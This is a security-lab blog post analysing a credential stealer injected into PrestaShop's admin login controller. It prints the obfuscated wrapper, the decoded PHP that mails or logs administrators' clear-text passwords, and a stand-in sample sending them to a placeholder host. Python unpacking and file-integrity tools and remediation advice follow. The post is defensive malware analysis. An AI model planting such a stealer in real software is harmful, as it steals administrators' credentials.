PrestaShop Login Stealer

Labs Note

Lately, we have noticed an increase in attempts to steal login credentials from e-commerce websites, and in the techniques used to do it. These sites hold sensitive information, such as credit card data and back-end credentials, that lets attackers profit both from the data itself and from the infected site.

This post covers a different technique being used against PrestaShop installations. It differs from the one we described in an earlier blog post here.

In this case the attackers again targeted the ‘./controllers/admin/AdminLoginController.php’ file, but injected a different piece of malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:

<?php
// Injected into the admin login controller after the form is processed, so
// $email, $passwd and $employee are the controller's own variables (the
// submitted credentials and the loaded Employee object).
if (function_exists("mail")) {
    // Exfiltration addresses (redacted). The keys are only used as salutations.
    $listo = array(
        'eNyong' => 'a<removed>@<removed>mail.com',
        'Dowoh'  => 'm<removed>l@<removed>mail.com'
    );
    foreach ($listo as $ming => $imel) {
        // Indonesian-language subject and body: the victim's hostname plus the
        // employee's name, e-mail and clear-text password.
        mail($imel,
             'Setoran Admin ' . $_SERVER['HTTP_HOST'] . ' ^^',
             "Kye Pak $ming,\n\nNama: " . $employee->firstname . " " . $employee->lastname
             . "\nEmail: $email\nPassword: $passwd");
    }
} else {
    // Fallback when mail() is disabled: append the credentials to a text file
    // that the attacker can later download through the web server.
    $f = fopen('uspas.txt', 'a');
    fwrite($f, "imel:$email | pass: $passwd\n");
    fclose($f);
}
?>

The attackers used an interesting conditional that gets them the data regardless of server limitations. If the server can send e-mail, the freshly entered credentials are mailed to the attackers' addresses; if mail() is disabled, they are appended to a file named ‘uspas.txt’ in the script's working directory, inside the web root. In both cases the normal login flow is left untouched, so the administrator sees nothing unusual.
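To inspect an injection like this without executing it, the wrapper can be unpacked statically: base64-decode the blob, then inflate it as raw DEFLATE (PHP's gzinflate() expects no zlib or gzip header), and repeat for any nested layers. The following Python script is an added example, not code from the original post. Since the real payload above is elided, the obfuscated sample it unpacks is constructed here by compressing a harmless stand-in that mirrors the mail()/fopen() structure of the decoded stealer; the indicator list and the php_gzdeflate_b64() helper are likewise our own.

```python
"""Static unpacker and triage for eval(gzinflate(base64_decode("..."))) injections.

Added example, not code from the original post. The obfuscated sample is
constructed below; the post's real payload is elided and not reproduced.
"""
import base64
import re
import zlib

# One layer of the wrapper seen in the post. Assumed regex; it accepts the
# usual whitespace variations and either quote style around the blob.
WRAPPER_RE = re.compile(
    r'eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)\s*\)\s*;?'
)

# Strings a credential stealer of this kind needs: it mails or writes out the
# login controller's variables and tags the message with the victim's hostname.
INDICATORS = (
    "mail(", "fopen(", "fwrite(", "$passwd", "$email", "$_SERVER['HTTP_HOST']",
)


def php_gzdeflate_b64(code: str) -> str:
    """Build what PHP's base64_encode(gzdeflate($code)) produces (raw DEFLATE)."""
    comp = zlib.compressobj(9, zlib.DEFLATED, -15)  # -15: raw DEFLATE, no header
    data = comp.compress(code.encode()) + comp.flush()
    return base64.b64encode(data).decode()


def unpack(source: str, max_layers: int = 10) -> tuple[str, int]:
    """Peel eval(gzinflate(base64_decode())) layers without running anything.

    Returns (innermost code, layers removed). Stops when no wrapper remains or
    when a blob cannot be decoded (e.g. an edited or truncated sample), in which
    case the text is returned as it was.
    """
    layers = 0
    current = source
    while layers < max_layers:
        m = WRAPPER_RE.search(current)
        if not m:
            break
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            current = zlib.decompress(raw, -15).decode("utf-8", "replace")
        except (ValueError, zlib.error):  # binascii.Error is a ValueError
            break
        layers += 1
    return current, layers


def find_indicators(code: str) -> list[str]:
    """Indicator strings present in the unpacked code, in list order."""
    return [i for i in INDICATORS if i in code]


def triage(file_text: str) -> dict:
    """Small report for a suspect file: layers removed, indicators hit, code."""
    code, layers = unpack(file_text)
    return {"layers": layers, "indicators": find_indicators(code), "decoded": code}


# Constructed stand-in for the decoded stealer: same control flow as the sample
# in the post (mail() if available, else append to uspas.txt), exfil address replaced.
FAKE_PAYLOAD = '''<?php
if (function_exists("mail")) {
    mail('attacker@example.invalid', 'Admin '.$_SERVER['HTTP_HOST'], "Email: $email\\nPassword: $passwd");
} else {
    $f = fopen('uspas.txt', 'a'); fwrite($f, "$email | $passwd\\n"); fclose($f);
}
?>'''

# Two nested wrapper layers, a common way of stacking this obfuscation.
INJECTED = 'eval(gzinflate(base64_decode("%s")));' % php_gzdeflate_b64(
    'eval(gzinflate(base64_decode("%s")));' % php_gzdeflate_b64(FAKE_PAYLOAD)
)

if __name__ == "__main__":
    report = triage(INJECTED)
    print(f"layers removed: {report['layers']}")
    print(f"indicators: {report['indicators']}")
    print(report["decoded"])
```

Run it against a suspect controller with `triage(open(path).read())`; a non-zero layer count on a core PrestaShop file is by itself a finding, and the indicator list tells you quickly whether the unpacked code touches credentials. The same loop generalises to other single-layer wrappers (str_rot13, gzuncompress) by swapping the regex and the decode step.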

From there the attackers only had to check their mailbox or fetch the .txt file from the victim's website.

In case of a compromise, assume that every credential entered through the back-end since the injection was captured and that all user accounts and their personal information were exposed. Remove the injected code, then change all passwords for the back-end, cPanel, SFTP and any other access mechanism that could give the attackers leverage.

A business's reputation can be damaged if sensitive information or customers' credit card details fall into the wrong hands, so good security practices such as File Integrity Monitoring, a Web Application Firewall and similar controls help reduce the risk of infection.
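A minimal version of the File Integrity Monitoring mentioned above, as an added example (not code from the post or from PrestaShop): hash every file under the installation once into a baseline kept outside the web root, then report files that were modified, added or removed. The demo() function reproduces the post's scenario with constructed files in a temporary directory; only the path names are taken from the post.

```python
"""Baseline-and-diff file integrity check. Added example, not from the post."""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_tree(root: Path) -> dict[str, str]:
    """Map every file under root (relative POSIX path) to its SHA-256 digest."""
    digests = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            h = hashlib.sha256()
            with path.open("rb") as fh:
                for chunk in iter(lambda: fh.read(1 << 16), b""):
                    h.update(chunk)
            digests[path.relative_to(root).as_posix()] = h.hexdigest()
    return digests


def save_baseline(root: Path, baseline_file: Path) -> None:
    """Write the current digests; store this file outside the web root."""
    baseline_file.write_text(json.dumps(hash_tree(root), indent=1, sort_keys=True))


def compare(root: Path, baseline_file: Path) -> dict[str, list[str]]:
    """Return {'modified': [...], 'added': [...], 'removed': [...]} vs. baseline."""
    old = json.loads(baseline_file.read_text())
    new = hash_tree(root)
    return {
        "modified": sorted(p for p in old if p in new and old[p] != new[p]),
        "added": sorted(p for p in new if p not in old),
        "removed": sorted(p for p in old if p not in new),
    }


def demo() -> dict[str, list[str]]:
    """Constructed scenario: clean baseline, then the post's two artifacts
    (an injected AdminLoginController.php and a dropped uspas.txt)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "prestashop"          # stand-in for the web root
        ctrl = root / "controllers" / "admin"
        ctrl.mkdir(parents=True)
        login = ctrl / "AdminLoginController.php"
        login.write_text("<?php class AdminLoginController extends AdminController {} ?>\n")
        (ctrl / "AdminOrdersController.php").write_text(
            "<?php class AdminOrdersController extends AdminController {} ?>\n")
        baseline = Path(tmp) / "baseline.json"   # outside the web root
        save_baseline(root, baseline)

        # The injection: an obfuscated wrapper appended to the login controller.
        with login.open("a") as fh:
            fh.write('eval(gzinflate(base64_decode("...")));\n')
        # The mail() fallback: credentials dropped next to the controller.
        (ctrl / "uspas.txt").write_text("imel:admin@example.invalid | pass: hunter2\n")
        return compare(root, baseline)


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

On a real installation, take the baseline right after a clean deploy or upgrade (for example `save_baseline(Path("/var/www/prestashop"), Path("/root/ps-baseline.json"))`) and run compare() from cron; any change to a core controller, or a new .txt or .php file appearing under the admin directory, deserves a look even before you decode it.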
